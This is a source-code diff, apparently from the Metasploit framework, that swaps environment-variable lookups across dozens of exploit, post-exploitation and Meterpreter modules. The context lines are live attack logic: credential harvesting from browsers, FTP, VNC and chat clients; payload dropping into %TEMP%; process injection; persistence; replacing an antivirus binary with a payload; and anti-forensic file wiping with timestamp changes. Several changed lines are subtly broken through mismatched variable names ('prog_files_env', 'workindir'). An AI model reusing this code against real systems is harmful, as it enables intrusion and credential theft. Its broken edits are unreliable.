begin
@ -122,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Local
moved = false
configed = false
#default path, but there should be an ImagePath registry key
source = session.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
source = "#{sysdir}\\system32\\#{serv}.exe"
#get path to exe; parse out quotes and arguments
sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
sourcemaybe = session.fs.file.expand_path(sourceorig)

2
modules/exploits/windows/misc/altiris_ds_sqli.rb
View File

@ -190,7 +190,7 @@ Processor-Speed=#{processor_speed}
end
end
win_temp = client.fs.file.expand_path("%TEMP%")
win_temp = client.sys.config.getenv('TEMP')
win_file = "#{win_temp}\\#{payload_exe}"
print_status("Attempting to delete #{win_file} ...")
client.shell_command_token(%Q|attrib.exe -r #{win_file}|)

2
modules/exploits/windows/novell/file_reporter_fsfui_upload.rb
View File

@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
print_good("Deleting the VBS payload \"#{@var_vbs_name}.vbs\" ...")
windir = client.fs.file.expand_path("%WINDIR%")
windir = client.sys.config.getenv('WINDIR')
client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs")
print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...")
cmd = "#{windir}\\system32\\attrib.exe -r " +

2
modules/exploits/windows/novell/netiq_pum_eval.rb
View File

@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
begin
windir = session.fs.file.expand_path("%WINDIR%")
windir = session.sys.config.getenv('WINDIR')
win_file = "#{windir}\\system32\\#{win_file}"
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the

2
modules/post/linux/manage/download_exec.rb
View File

@ -45,7 +45,7 @@ class Metasploit3 < Msf::Post
end
def exists_exe?(exe)
path = expand_path("$PATH")
path = session.sys.config.getenv("PATH")
if path.nil? or path.empty?
return false
end

4
modules/post/multi/gather/apple_ios_backup.rb
View File

@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
paths = enum_users_unix
when /win/
@platform = :windows
drive = session.fs.file.expand_path("%SystemDrive%")
drive = session.sys.config.getenv('SystemDrive')
os = session.sys.config.sysinfo['OS']
if os =~ /Windows 7|Vista|2008/
@ -265,7 +265,7 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
session.shell_command("whoami").chomp
end

5
modules/post/multi/gather/env.rb
View File

@ -54,9 +54,8 @@ class Metasploit3 < Msf::Post
var_names << registry_enumvals("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment")
output = []
var_names.delete(nil)
var_names.flatten.uniq.sort.each do |v|
# Emulate the output of set and env, e.g. VAR=VALUE
output << "#{v}=#{session.fs.file.expand_path("\%#{v}\%")}"
session.sys.config.getenvs(*var_names.flatten.uniq.sort).each do |k, v|
output << "#{k}=#{v}"
end
@output = output.join("\n")
@ltype = "windows.environment"

2
modules/post/multi/gather/filezilla_client_cred.rb
View File

@ -240,7 +240,7 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
session.shell_command("whoami").chomp
end

9
modules/post/multi/gather/firefox_creds.rb
View File

@ -277,7 +277,6 @@ class Metasploit3 < Msf::Post
def get_ff_and_loot_path
@paths = {}
check_paths = []
drive = expand_path("%SystemDrive%")
loot_file = Rex::Text::rand_text_alpha(6) + ".txt"
case @platform
@ -286,7 +285,9 @@ class Metasploit3 < Msf::Post
print_error("You need root privileges on this platform for DECRYPT option")
return false
end
tmpdir = expand_path("%TEMP%") + "\\"
env_vars = session.sys.config.getenvs('TEMP', 'SystemDrive')
tmpdir = env_vars['TEMP'] + "\\"
drive = env_vars['SystemDrive']
# this way allows for more independent use of meterpreter
# payload (32 and 64 bit) and cleaner code
check_paths << drive + '\\Program Files\\Mozilla Firefox\\'
@ -643,9 +644,9 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
return session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
return session.shell_command("whoami").chomp
session.shell_command("whoami").chomp
end
end
end

2
modules/post/multi/gather/pidgin_cred.rb
View File

@ -307,7 +307,7 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
session.shell_command("whoami").chomp
end

2
modules/post/multi/gather/thunderbird_creds.rb
View File

@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post
base = "/Users/#{user}/Library/Thunderbird/Profiles/"
when /win/
if session.type =~ /meterpreter/
user_profile = session.fs.file.expand_path("%APPDATA%")
user_profile = session.sys.config.getenv('APPDATA')
else
user_profile = cmd_exec("echo %APPDATA%").strip
end

2
modules/post/windows/escalate/ms10_073_kbdlayout.rb
View File

@ -176,7 +176,7 @@ EOS
ring0_code.gsub!('TPTP', [pid].pack('V'))
# Create the malicious Keyboard Layout file...
tmpdir = session.fs.file.expand_path("%TEMP%")
tmpdir = session.sys.config.getenv('TEMP')
fname = "p0wns.boom"
dllpath = "#{tmpdir}\\#{fname}"
fd = session.fs.file.new(dllpath, 'wb')

2
modules/post/windows/escalate/net_runtime_modify.rb
View File

@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
paths = []
services = []
vuln = ""
@temp = session.fs.file.expand_path("%TEMP%")
@temp = session.sys.config.getenv('TEMP')
if init_railgun() == :error
return

10
modules/post/windows/gather/credentials/bulletproof_ftp.rb
View File

@ -233,12 +233,14 @@ class Metasploit3 < Msf::Post
print_status("Searching BulletProof FTP Client installation directory...")
# BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
program_files_x86 = expand_path('%ProgramFiles(X86)%')
if not program_files_x86.empty? and program_files_x86 !~ /%ProgramFiles\(X86\)%/
program_files = program_files_x86 #x64
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
progfilesx86 = prog_files_env['ProgramFiles(X86)']
if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
program_files = progfilesx86 # x64
else
program_files = expand_path('%ProgramFiles%') #x86
program_files = progfiles_env['ProgramFiles'] # x86
end
session.fs.dir.foreach(program_files) do |dir|
if dir =~ /BulletProof FTP Client/
vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}")

4
modules/post/windows/gather/credentials/filezilla_server.rb
View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
return
end
drive = session.fs.file.expand_path("%SystemDrive%")
drive = session.sys.config.getenv('SystemDrive')
case session.platform
when /win64/i
@progs = drive + '\\Program Files (x86)\\'
@ -360,6 +360,6 @@ class Metasploit3 < Msf::Post
end
def whoami
return session.fs.file.expand_path("%USERNAME%")
return session.sys.config.getenv('USERNAME')
end
end

8
modules/post/windows/gather/credentials/steam.rb
View File

@ -40,10 +40,12 @@ class Metasploit3 < Msf::Post
# Steam client is only 32 bit so we need to know what arch we are on so that we can use
# the correct program files folder.
# We will just use an x64 only defined env variable to check.
if not expand_path('%ProgramFiles(X86)%').empty? and expand_path('%ProgramFiles(X86)%') !~ /%ProgramFiles\(X86\)%/
progs = expand_path('%ProgramFiles(X86)%') #x64
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
progfilesx86 = prog_files_env['ProgramFiles(X86)']
if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
progs = progfilesx86 # x64
else
progs = expand_path('%ProgramFiles%') #x86
progs = progfiles_env['ProgramFiles'] # x86
end
path = progs + '\\Steam\\config'

3
modules/post/windows/gather/credentials/tortoisesvn.rb
View File

@ -103,8 +103,7 @@ class Metasploit3 < Msf::Post
def get_config_files
# Determine if TortoiseSVN is installed and parse config files
savedpwds = 0
user_appdata = session.fs.file.expand_path("%APPDATA%")
path = user_appdata + '\\Subversion\\auth\\svn.simple\\'
path = session.fs.file.expand_path("%APPDATA%\\Subversion\\auth\\svn.simple\\")
print_status("Checking for configuration files in: #{path}")
begin

2
modules/post/windows/gather/credentials/total_commander.rb
View File

@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post
end
def check_systemroot
winpath = expand_path("%SYSTEMROOT%")+'\\wcx_ftp.ini'
winpath = expand_path("%SYSTEMROOT%\\wcx_ftp.ini")
check_other(winpath)
end

14
modules/post/windows/gather/credentials/vnc.rb
View File

@ -98,11 +98,15 @@ class Metasploit3 < Msf::Post
locations = []
#Checks
locations << {:name => 'UltraVNC',
:check_file => session.fs.file.expand_path("%PROGRAMFILES%")+'\\UltraVNC\\ultravnc.ini',
:pass_variable => 'passwd=',
:viewonly_variable => 'passwd2=',
:port_variable => 'PortNumber='}
progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)')
progfiles_env.each do |k, v|
next if v.blank?
locations << {:name => 'UltraVNC',
:check_file => "#{v}\\UltraVNC\\ultravnc.ini",
:pass_variable => 'passwd=',
:viewonly_variable => 'passwd2=',
:port_variable => 'PortNumber='}
end
locations << {:name => 'WinVNC3_HKLM',
:check_reg => 'HKLM\\Software\\ORL\\WinVNC3',

2
modules/post/windows/gather/credentials/winscp.rb
View File

@ -237,7 +237,7 @@ class Metasploit3 < Msf::Post
def run
print_status("Looking for WinSCP.ini file storage...")
get_ini(client.fs.file.expand_path("%PROGRAMFILES%")+'\\WinSCP\\WinSCP.ini')
get_ini(client.fs.file.expand_path("%PROGRAMFILES%\\WinSCP\\WinSCP.ini"))
print_status("Looking for Registry Storage...")
get_reg()
print_status("Done!")

5
modules/post/windows/gather/dumplinks.rb
View File

@ -53,7 +53,8 @@ class Metasploit3 < Msf::Post
user = session.sys.config.getuid
userpath = nil
useroffcpath = nil
sysdrv = session.fs.file.expand_path("%SystemDrive%")
env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
sysdrv = env_vars['SystemDrive']
if os =~ /Windows 7|Vista|2008/
userpath = sysdrv + "\\Users\\"
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
@ -76,7 +77,7 @@ class Metasploit3 < Msf::Post
userinfo = {}
end
else
uservar = session.fs.file.expand_path("%USERNAME%")
uservar = env_vars['USERNAME']
userinfo['username'] = uservar
userinfo['userpath'] = userpath + uservar + lnkpath
userinfo['useroffcpath'] = userpath + uservar + officelnkpath

5
modules/post/windows/gather/enum_chrome.rb
View File

@ -285,7 +285,8 @@ class Metasploit3 < Msf::Post
host = session.session_host
#Get Google Chrome user data path
sysdrive = expand_path("%SYSTEMDRIVE%").strip
env_vars = session.sys.config.getenvs('SYSTEMDRIVE', 'USERNAME')
sysdrive = env_vars['SYSTEMDRIVE'].strip
if directory?("#{sysdrive}\\Users")
@profiles_path = "#{sysdrive}/Users"
@data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
@ -310,7 +311,7 @@ class Metasploit3 < Msf::Post
else
uid = session.sys.config.getuid
print_status "Running as user '#{uid}'..."
usernames << expand_path("%USERNAME%").strip
usernames << env_vars['USERNAME'].strip
end
has_sqlite3 = true

4
modules/post/windows/gather/enum_db.rb
View File

@ -292,7 +292,7 @@ class Metasploit3 < Msf::Post
return results
end
windir = session.fs.file.expand_path("%windir%")
windir = session.sys.config.getenv('windir')
getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
data = nil
@ -332,7 +332,7 @@ class Metasploit3 < Msf::Post
elsif exist?(val_location + "\\my.cnf")
data = read_file(val_location + "\\my.cnf")
else
sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%")
sysdriv=session.sys.config.getenv('SYSTEMDRIVE')
getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
getfile.each do |file|
if exist?("#{file['path']}\\#{file['name']}")

2
modules/post/windows/gather/enum_files.rb
View File

@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
def download_files(location, file_type)
sysdriv = client.fs.file.expand_path("%SYSTEMDRIVE%")
sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
sysnfo = client.sys.config.sysinfo['OS']
profile_path_old = sysdriv + "\\Documents and Settings\\"
profile_path_new = sysdriv + "\\Users\\"

2
modules/post/windows/gather/enum_ie.rb
View File

@ -257,7 +257,7 @@ class Metasploit3 < Msf::Post
xp_c = "\\Cookies\\index.dat"
h_paths = []
c_paths = []
base = session.fs.file.expand_path("%USERPROFILE%")
base = session.sys.config.getenv('USERPROFILE')
if host['OS'] =~ /(Windows 7|2008|Vista)/
h_paths << base + vist_h
h_paths << base + vist_hlow

7
modules/post/windows/gather/enum_powershell_env.rb
View File

@ -28,7 +28,8 @@ class Metasploit3 < Msf::Post
users = []
user = session.sys.config.getuid
path4users = ""
sysdrv = session.fs.file.expand_path("%SystemDrive%")
env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
sysdrv = env_vars['SystemDrive']
if os =~ /Windows 7|Vista|2008/
path4users = sysdrv + "\\Users\\"
@ -49,7 +50,7 @@ class Metasploit3 < Msf::Post
end
else
userinfo = {}
uservar = session.fs.file.expand_path("%USERNAME%")
uservar = env_vars['USERNAME']
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + profilepath
users << userinfo
@ -89,7 +90,7 @@ class Metasploit3 < Msf::Post
end
if powershell_version =~ /2./
print_status("Powershell Modules:")
powershell_module_path = session.fs.file.expand_path("%PSModulePath%")
powershell_module_path = session.sys.config.getenv('PSModulePath')
session.fs.dir.foreach(powershell_module_path) do |m|
next if m =~ /^(\.|\.\.)$/
print_status("\t#{m}")

2
modules/post/windows/gather/enum_prefetch.rb
View File

@ -183,7 +183,7 @@ class Metasploit3 < Msf::Post
print_prefetch_key_value
print_timezone_key_values(key_value)
print_good("Current UTC Time: %s" % Time.now.utc)
sys_root = expand_path("%SYSTEMROOT%")
sys_root = session.sys.config.getenv('SYSTEMROOT')
full_path = sys_root + "\\Prefetch\\"
file_type = "*.pf"
print_status("Gathering information from remote system. This will take awhile..")

2
modules/post/windows/gather/enum_unattend.rb
View File

@ -115,7 +115,7 @@ class Metasploit3 < Msf::Post
# Initialize all 7 possible paths for the answer file
#
def init_paths
drive = session.fs.file.expand_path("%SystemDrive%")
drive = session.sys.config.getenv('SystemDrive')
files =
[

18
modules/post/windows/manage/download_exec.rb
View File

@ -35,7 +35,7 @@ class Metasploit3 < Msf::Post
register_advanced_options(
[
OptString.new('EXEC_STRING', [false, 'Execution parameters when run from download directory' ]),
OptInt.new('EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]),
OptInt.new( 'EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]),
OptBool.new( 'DELETE', [true, 'Delete file after execution', false ]),
], self.class)
@ -76,16 +76,16 @@ class Metasploit3 < Msf::Post
url = datastore["URL"]
filename = datastore["FILENAME"] || url.split('/').last
download_path = session.fs.file.expand_path(datastore["DOWNLOAD_PATH"])
if download_path.nil? or download_path.empty?
path = session.fs.file.expand_path("%TEMP%")
path = datastore['DOWNLOAD_PATH']
if path.blank?
path = session.sys.config.getenv('TEMP')
else
path = download_path
path = session.fs.file.expand_path(path)
end
outpath = path + '\\' + filename
exec = datastore['EXECUTE']
exec_string = datastore['EXEC_STRING'] || ''
exec_string = datastore['EXEC_STRING']
output = datastore['OUTPUT']
remove = datastore['DELETE']
@ -108,11 +108,7 @@ class Metasploit3 < Msf::Post
# Execute file upon request
if exec
begin
cmd = "#{outpath} #{exec_string}"
# If we don't have the following gsub, we get this error in Windows:
# "Operation failed: The system cannot find the file specified"
cmd = cmd.gsub(/\\/, '\\\\\\').gsub(/\s/, '\ ')
cmd = "\"#{outpath}\" #{exec_string}"
print_status("Executing file: #{cmd}")
res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT'])

2
modules/post/windows/manage/ie_proxypac.rb
View File

@ -87,7 +87,7 @@ class Metasploit3 < Msf::Post
end
def create_pac(local_pac)
pac_file = expand_path("%APPDATA%") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
pac_file = session.sys.config.getenv("APPDATA") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
conf_pac = ""
if ::File.exists?(local_pac)

2
modules/post/windows/manage/payload_inject.rb
View File

@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post
# Creates a temp notepad.exe to inject payload in to given the payload
# Returns process PID
def create_temp_proc(pay)
windir = client.fs.file.expand_path("%windir%")
windir = client.sys.config.getenv('windir')
# Select path of executable to run depending the architecture
if pay.arch.join == "x86" and client.platform =~ /x86/
cmd = "#{windir}\\System32\\notepad.exe"

3
modules/post/windows/manage/rpcapd_start.rb
View File

@ -46,7 +46,8 @@ class Metasploit3 < Msf::Post
else
print_status("Rpcap service found: #{serv['Name']}")
reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
# TODO: check if this works on x64
prog=session.sys.config.getenv('ProgramFiles') << "\\winpcap\\rpcapd.exe"
if reg != 2
print_status("Setting rpcapd as 'auto' service")
service_change_startup("rpcapd","auto")

2
modules/post/windows/manage/run_as.rb
View File

@ -106,7 +106,7 @@ class Metasploit3 < Msf::Post
end
# set profile paths
sysdrive = session.fs.file.expand_path("%SYSTEMDRIVE%")
sysdrive = session.sys.config.getenv('SYSTEMDRIVE')
os = @host_info['OS']
profiles_path = sysdrive + "\\Documents and Settings\\"
profiles_path = sysdrive + "\\Users\\" if os =~ /(Windows 7|2008|Vista)/

20
modules/post/windows/manage/sdel.rb
View File

@ -57,8 +57,8 @@ class Metasploit3 < Msf::Post
#Function to calculate the size of the cluster
def size_cluster()
drive = expand_path("%SystemDrive%")
r = client.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
drive = session.sys.config.getenv('SystemDrive')
r = session.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
cluster = r["lpBytesPerSector"] * r["lpSectorsPerCluster"]
print_status("Cluster Size: #{cluster}")
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post
#Function to calculate the real file size on disk (file size + slack space)
def size_on_disk(file)
size_file = client.fs.file.stat(file).size;
size_file = session.fs.file.stat(file).size;
print_status("Size of the file: #{size_file}")
if (size_file<800)
@ -94,13 +94,13 @@ class Metasploit3 < Msf::Post
rsec= Rex::Text.rand_text_numeric(7,bad='012')
date = Time.now - rsec.to_i
print_status("Changing MACE attributes")
client.priv.fs.set_file_mace(file, date,date,date,date)
session.priv.fs.set_file_mace(file, date,date,date,date)
end
#Function to overwrite the file
def file_overwrite(file,type,n)
#FILE_FLAG_WRITE_THROUGH: Write operations will go directly to disk
r = client.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
r = session.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
handle=r['return']
real_size=size_on_disk(file)
@ -118,10 +118,10 @@ class Metasploit3 < Msf::Post
end
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365541(v=vs.85).aspx
client.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
session.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx
w=client.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
w=session.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
if w['return']==false
print_error("The was an error writing to disk, check permissions")
@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post
print_status("#{w['lpNumberOfBytesWritten']} bytes overwritten")
end
client.railgun.kernel32.CloseHandle(handle)
session.railgun.kernel32.CloseHandle(handle)
change_mace(file)
#Generate a long random file name before delete it
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Post
print_status("Changing file name")
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365239(v=vs.85).aspx
client.railgun.kernel32.MoveFileA(file,newname)
session.railgun.kernel32.MoveFileA(file,newname)
file_rm(newname)
print_good("File erased!")
@ -148,7 +148,7 @@ class Metasploit3 < Msf::Post
#Check if the file is encrypted or compressed
def comp_encr(file)
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa364944(v=vs.85).aspx
handle=client.railgun.kernel32.GetFileAttributesA(file)
handle=session.railgun.kernel32.GetFileAttributesA(file)
type= handle['return']
#FILE_ATTRIBUTE_COMPRESSED=0x800

4
scripts/meterpreter/dumplinks.rb
View File

@ -61,7 +61,7 @@ def enum_users(os)
user = @client.sys.config.getuid
userpath = nil
useroffcpath = nil
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /Windows 7|Vista|2008/
userpath = sysdrv + "\\Users\\"
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
@ -83,7 +83,7 @@ def enum_users(os)
users << userinfo
end
else
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userpath'] = userpath + uservar + lnkpath
userinfo['useroffcpath'] = userpath + uservar + officelnkpath

2
scripts/meterpreter/duplicate.rb
View File

@ -89,7 +89,7 @@ if client.platform =~ /win32|win64/
#
# Upload to the filesystem
#
tempdir = client.fs.file.expand_path("%TEMP%")
tempdir = client.sys.config.getenv('TEMP')
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tempexe.gsub!("\\\\", "\\")

4
scripts/meterpreter/enum_chrome.rb
View File

@ -195,7 +195,7 @@ host = session.session_host
@log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
::FileUtils.mkdir_p(@log_dir)
sysdrive = client.fs.file.expand_path("%SYSTEMDRIVE%")
sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
os = @host_info['OS']
if os =~ /(Windows 7|2008|Vista)/
@profiles_path = sysdrive + "\\Users\\"
@ -218,7 +218,7 @@ if is_system?
print_status "users found: #{usernames.join(", ")}"
else
print_status "running as user '#{uid}'..."
usernames << client.fs.file.expand_path("%USERNAME%")
usernames << client.sys.config.getenv('USERNAME')
prepare_railgun
end

5
scripts/meterpreter/enum_firefox.rb
View File

@ -251,8 +251,9 @@ if client.platform =~ /win32|win64/
if frfxchk
user = @client.sys.config.getuid
if not is_system?
usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%"))
db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
envs = @client.sys.config.getenvs('USERNAME', 'APPDATA')
usrname = envs['USERNAME']
db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"
if kill_frfx
kill_firefox
end

6
scripts/meterpreter/enum_powershell_env.rb
View File

@ -22,7 +22,7 @@ def enum_users
users = []
user = @client.sys.config.getuid
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /Windows 7|Vista|2008/
path4users = sysdrv + "\\Users\\"
@ -43,7 +43,7 @@ def enum_users
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + profilepath
users << userinfo
@ -83,7 +83,7 @@ def enum_powershell
end
if powershell_version =~ /2./
print_status("Powershell Modules:")
powershell_module_path = @client.fs.file.expand_path("%PSModulePath%")
powershell_module_path = @client.sys.config.getenv('PSModulePath')
@client.fs.dir.foreach(powershell_module_path) do |m|
next if m =~ /^(\.|\.\.)$/
print_status("\t#{m}")

4
scripts/meterpreter/enum_vmware.rb
View File

@ -223,7 +223,7 @@ def enum_users
users = []
user = @client.sys.config.getuid
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /7|Vista|2008/
path4users = sysdrv + "\\users\\"
@ -244,7 +244,7 @@ def enum_users
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + profilepath
users << userinfo

5
scripts/meterpreter/get_env.rb
View File

@ -18,13 +18,12 @@ def list_env_vars(var_names)
"Name",
"Value"
])
var_names.flatten.each do |v|
tbl << [v,@client.fs.file.expand_path("\%#{v}\%")]
@client.sys.config.getenvs(*var_names.flatten).each do |k, v|
tbl << [k, v]
end
print("\n" + tbl.to_s + "\n")
end
opts.parse(args) { |opt, idx, val|
case opt
when "-h"

4
scripts/meterpreter/get_filezilla_creds.rb
View File

@ -114,7 +114,7 @@ def enum_users(os)
users = []
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /7|Vista|2008/
path4users = sysdrv + "\\users\\"
@ -135,7 +135,7 @@ def enum_users(os)
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + path2purple
users << userinfo

4
scripts/meterpreter/get_pidgin_creds.rb
View File

@ -145,7 +145,7 @@ def enum_users(os)
users = []
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /Windows 7|Vista|2008/
path4users = sysdrv + "\\users\\"
@ -166,7 +166,7 @@ def enum_users(os)
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + path2purple
users << userinfo

2
scripts/meterpreter/getcountermeasure.rb
View File

@ -301,7 +301,7 @@ def checkdep(session)
tmpout = ""
depmode = ""
# Expand environment %TEMP% variable
tmp = session.fs.file.expand_path("%TEMP%")
tmp = session.sys.config.getenv('TEMP')
# Create random name for the wmic output
wmicfile = sprintf("%.5d",rand(100000))
wmicout = "#{tmp}\\#{wmicfile}"

2
scripts/meterpreter/hostsedit.rb
View File

@ -30,7 +30,7 @@ end
record = ""
#Set path to the hosts file
hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts"
hosts = session.sys.config.getenv('SYSTEMROOT')+"\\System32\\drivers\\etc\\hosts"
#Function check if UAC is enabled
def checkuac(session)
winver = session.sys.config.sysinfo

7
scripts/meterpreter/panda_2007_pavsrv51.rb
View File

@ -69,16 +69,15 @@ elsif client.platform =~ /win32|win64/
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Change to our working directory.
workingdir = client.fs.file.expand_path("%ProgramFiles%")
client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\")
workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\"
client.fs.dir.chdir(workindir)
# Create a backup of the original exe.
print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
# Place our newly created exe with the orginal binary name.
tempdir = client.fs.file.expand_path("%ProgramFiles%")
tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE"
tempexe = workingdir + "PAVSRV51.EXE"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")

2
scripts/meterpreter/persistence.rb
View File

@ -106,7 +106,7 @@ def write_script_to_target(target_dir,vbs)
if target_dir
tempdir = target_dir
else
tempdir = @client.fs.file.expand_path("%TEMP%")
tempdir = @client.sys.config.getenv('TEMP')
end
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
fd = @client.fs.file.new(tempvbs, "wb")

2
scripts/meterpreter/pml_driver_config.rb
View File

@ -70,7 +70,7 @@ if client.platform =~ /win32|win64/
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Place our newly created exe in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempdir = client.sys.config.getenv('TEMP')
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")

2
scripts/meterpreter/prefetchtool.rb
View File

@ -19,7 +19,7 @@ require 'digest/sha1'
"-l" => [ false, "Download Prefetch Folder Analysis Log"]
)
@tempdir = @session.fs.file.expand_path("%TEMP%")
@tempdir = @session.sys.config.getenv('TEMP')
#---------------------------------------------------------------------------------------------------------
def read_program_list

2
scripts/meterpreter/remotewinenum.rb
View File

@ -57,7 +57,7 @@ def wmicexec(session,wmic,user,pass,trgt)
runfail = 0
runningas = session.sys.config.getuid
begin
tmp = session.fs.file.expand_path("%TEMP%")
tmp = session.sys.config.getenv('TEMP')
# Temporary file on windows host to store results
wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"

2
scripts/meterpreter/scheduleme.rb
View File

@ -179,7 +179,7 @@ end
#---------------------------------------------------------------------------------------------------------
def upload(session,file)
location = session.fs.file.expand_path("%TEMP%")
location = session.sys.config.getenv('TEMP')
